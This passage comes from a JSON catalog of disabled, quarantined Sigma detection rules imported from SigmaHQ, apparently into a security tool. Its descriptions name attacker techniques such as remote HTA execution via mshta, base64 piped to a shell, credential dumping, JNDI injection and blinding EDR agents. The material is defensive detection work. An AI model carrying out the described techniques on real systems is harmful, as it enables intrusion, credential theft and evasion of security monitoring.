backdoor", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/winekey-registry-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_runkey_winekey.yml" } }, { "id": "sigmahq-sigma-b98a10af-1e1e-44a7-bab2-4cc026917648", "type": "detection", "name": "New PDQDeploy Service - Client Side", "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-pdqdeploy-service-client-side.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b98a10af-1e1e-44a7-bab2-4cc026917648", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml" } }, { "id": "sigmahq-sigma-b98d0db6-511d-45de-ad02-e82a98729620", "type": "detection", "name": "Remotely Hosted HTA File Executed Via Mshta.EXE", "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, 
which could indicate that an attacker is executing a remotely hosted malicious hta file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remotely-hosted-hta-file-executed-via-mshta-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b98d0db6-511d-45de-ad02-e82a98729620", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mshta_http.yml" } }, { "id": "sigmahq-sigma-b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", "type": "detection", "name": "HackTool - Inveigh Execution", "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-inveigh-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_inveigh.yml" } }, { "id": "sigmahq-sigma-b9aeac14-2ffd-4ad3-b967-1354a4e628c3", 
"type": "detection", "name": "PowerShell Get-Clipboard Cmdlet Via CLI", "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-get-clipboard-cmdlet-via-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" } }, { "id": "sigmahq-sigma-b9cbbc17-d00d-4e3d-a827-b06d03d2380d", "type": "detection", "name": "Monitoring For Persistence Via BITS", "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished.\nWhen the job runs on the system the command specified in the BITS job will be executed.\nThis can be abused by actors to create a backdoor within the system and for persistence.\nIt will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/monitoring-for-persistence-via-bits.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by 
the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml" } }, { "id": "sigmahq-sigma-b9d9b652-d8ed-4697-89a2-a1186ee680ac", "type": "detection", "name": "OSACompile Run-Only Execution", "description": "Detects potential suspicious run-only executions compiled using OSACompile", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/osacompile-run-only-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b9d9b652-d8ed-4697-89a2-a1186ee680ac", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_osacompile_runonly_execution.yml" } }, { "id": "sigmahq-sigma-b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", "type": "detection", "name": "Suspicious PowerShell Encoded Command Patterns", "description": "Detects PowerShell command line patterns in combination with encoded commands that often appear in malware infection chains", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/suspicious-powershell-encoded-command-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_cmd_patterns.yml" } }, { "id": "sigmahq-sigma-b9e1f193-d236-4451-aaae-2f3d2102120d", "type": "detection", "name": "Cisco Sniffing", "description": "Show when a monitor or a span/rspan is setup or modified", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-sniffing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b9e1f193-d236-4451-aaae-2f3d2102120d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_net_sniff.yml" } }, { "id": "sigmahq-sigma-b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b", "type": "detection", "name": "Windows Defender Context Menu Removed", "description": "Detects the use of reg.exe or PowerShell to delete the Windows Defender context menu handler registry keys.\nThis action removes the \"Scan with Microsoft Defender\" option from the right-click menu for files, directories, and drives.\nAttackers may use this technique to hinder manual, on-demand scans and reduce the visibility of the 
security product.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-context-menu-removed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_defender_remove_context_menu.yml" } }, { "id": "sigmahq-sigma-b9f0e6f5-09b4-4358-bae4-08408705bd5c", "type": "detection", "name": "New User Created Via Net.EXE With Never Expire Option", "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-user-created-via-net-exe-with-never-expire-option.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml" } }, { "id": "sigmahq-sigma-ba1f7802-adc7-48b4-9ecb-81e227fddfd5", 
"type": "detection", "name": "Potential Network Sniffing Activity Using Network Tools", "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-network-sniffing-activity-using-network-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_network_sniffing.yml" } }, { "id": "sigmahq-sigma-ba226dcf-d390-4642-b9af-b534872f1156", "type": "detection", "name": "Windows Event Log Access Tampering Via Registry", "description": "Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify an event log channel. 
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as \"Get-EventLog\" or \"wevtutil\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-event-log-access-tampering-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ba226dcf-d390-4642-b9af-b534872f1156", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_windows_event_log_access.yml" } }, { "id": "sigmahq-sigma-ba3874b9-0fae-465f-836c-eb5d071a1789", "type": "detection", "name": "NodeJS Execution of JavaScript File", "description": "Detects execution of JavaScript or JSC files using NodeJs binary node.exe, that could be potentially suspicious.\nNode.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development.\nAdversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems.\nBecause Node.js is commonly used, this rule may generate false positives in some environments. 
However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/nodejs-execution-of-javascript-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ba3874b9-0fae-465f-836c-eb5d071a1789", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_security_susp_node_js_execution.yml" } }, { "id": "sigmahq-sigma-ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", "type": "detection", "name": "Potential WinAPI Calls Via CommandLine", "description": "Detects the use of WinAPI Functions via the commandline. 
As seen used by threat actors via the tool winapiexec", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1106" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-winapi-calls-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_inline_win_api_access.yml" } }, { "id": "sigmahq-sigma-ba42babc-0666-4393-a4f7-ceaf5a69191e", "type": "detection", "name": "Uncommon Child Processes Of SndVol.exe", "description": "Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-child-processes-of-sndvol-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ba42babc-0666-4393-a4f7-ceaf5a69191e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sndvol_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-ba4cfc11-d0fa-4d94-bf20-7c332c412e76", "type": 
"detection", "name": "Potentially Suspicious DLL Registered Via Odbcconf.EXE", "description": "Detects execution of \"odbcconf\" with the \"REGSVR\" action where the DLL in question doesn't contain a \".dll\" extension. Which is often used as a method to evade defenses.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-dll-registered-via-odbcconf-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ba4cfc11-d0fa-4d94-bf20-7c332c412e76", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml" } }, { "id": "sigmahq-sigma-ba592c6d-6888-43c3-b8c6-689b8fe47337", "type": "detection", "name": "Linux Base64 Encoded Pipe to Shell", "description": "Detects suspicious process command line that uses base64 encoded input for execution with a shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-base64-encoded-pipe-to-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ba592c6d-6888-43c3-b8c6-689b8fe47337", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_base64_execution.yml" } }, { "id": "sigmahq-sigma-bab049ca-7471-4828-9024-38279a4c04da", "type": "detection", "name": "Virtualbox Driver Installation or Starting of VMs", "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1564.006", "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/virtualbox-driver-installation-or-starting-of-vms.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bab049ca-7471-4828-9024-38279a4c04da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_virtualbox_execution.yml" } }, { "id": "sigmahq-sigma-bac9fb54-2da7-44e9-988f-11e9a5edbc0c", "type": "detection", "name": "Potential Password Spraying Attempt Using Dsacls.EXE", "description": "Detects possible password spraying attempts using Dsacls", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-password-spraying-attempt-using-dsacls-exe.yaml", "quarantine_reason": "imported 
rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" } }, { "id": "sigmahq-sigma-baca5663-583c-45f9-b5dc-ea96a22ce542", "type": "detection", "name": "Sticky Key Like Backdoor Usage - Registry", "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1546.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sticky-key-like-backdoor-usage-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "baca5663-583c-45f9-b5dc-ea96a22ce542", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml" } }, { "id": "sigmahq-sigma-bacf58c6-e199-4040-a94f-95dea0f1e45a", "type": "detection", "name": "Windows Filtering Platform Blocked Connection From EDR Agent Binary", "description": "Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents.\nAdversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events.", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-filtering-platform-blocked-connection-from-edr-agent-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bacf58c6-e199-4040-a94f-95dea0f1e45a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml" } }, { "id": "sigmahq-sigma-bae2865c-5565-470d-b505-9496c87d0c30", "type": "detection", "name": "SMB Spoolss Name Piped Usage", "description": "Detects the use of the spoolss named pipe over SMB. 
This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/smb-spoolss-name-piped-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bae2865c-5565-470d-b505-9496c87d0c30", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml" } }, { "id": "sigmahq-sigma-baecf8fb-edbf-429f-9ade-31fc3f22b970", "type": "detection", "name": "Office Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry. 
Adversaries may modify these keys to execute malicious code when Office files are opened.\nThere are various legitimate add-ins that also use these keys and this filter list might not be exhaustive.\nThus, it is recommended to review and tune filters for your environment to reduce false positives before deploying to production.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/office-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "baecf8fb-edbf-429f-9ade-31fc3f22b970", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" } }, { "id": "sigmahq-sigma-baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", "type": "detection", "name": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-credential-dumping-attempt-using-new-networkprovider-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 
"source": "SigmaHQ/sigma", "source_id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_new_network_provider.yml" } }, { "id": "sigmahq-sigma-bafac3d6-7de9-4dd9-8874-4a1194b493ed", "type": "detection", "name": "Abusing Print Executable", "description": "Attackers can use print.exe for remote file copy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/abusing-print-executable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml" } }, { "id": "sigmahq-sigma-bb09dd3e-2b78-4819-8e35-a7c1b874e449", "type": "detection", "name": "HackTool - Inveigh Execution Artefacts", "description": "Detects the presence and execution of Inveigh via dropped artefacts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-inveigh-execution-artefacts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by 
the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_inveigh_artefacts.yml" } }, { "id": "sigmahq-sigma-bb0e87ce-c89f-4857-84fa-095e4483e9cb", "type": "detection", "name": "Suspicious Child Process of Notepad++ Updater - GUP.Exe", "description": "Detects suspicious child process creation by the Notepad++ updater process (gup.exe).\nThis could indicate potential exploitation of the updater component to deliver unwanted malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1195.002", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-child-process-of-notepad-updater-gup-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bb0e87ce-c89f-4857-84fa-095e4483e9cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gup_susp_child_process.yml" } }, { "id": "sigmahq-sigma-bb0e9cec-d4da-46f5-997f-22efc59f3dca", "type": "detection", "name": "Potential JNDI Injection Exploitation In JVM Based Application", "description": "Detects potential JNDI Injection exploitation. 
Often coupled with Log4Shell exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-jndi-injection-exploitation-in-jvm-based-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "bb0e9cec-d4da-46f5-997f-22efc59f3dca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/jvm/java_jndi_injection_exploitation_attempt.yml" } }, { "id": "sigmahq-sigma-bb2ba6fb-95d4-4a25-89fc-30bb736c021a", "type": "detection", "name": "PowerShell Core DLL Loaded Via Office Application", "description": "Detects PowerShell core DLL being loaded by an Office Product", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-core-dll-loaded-via-office-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 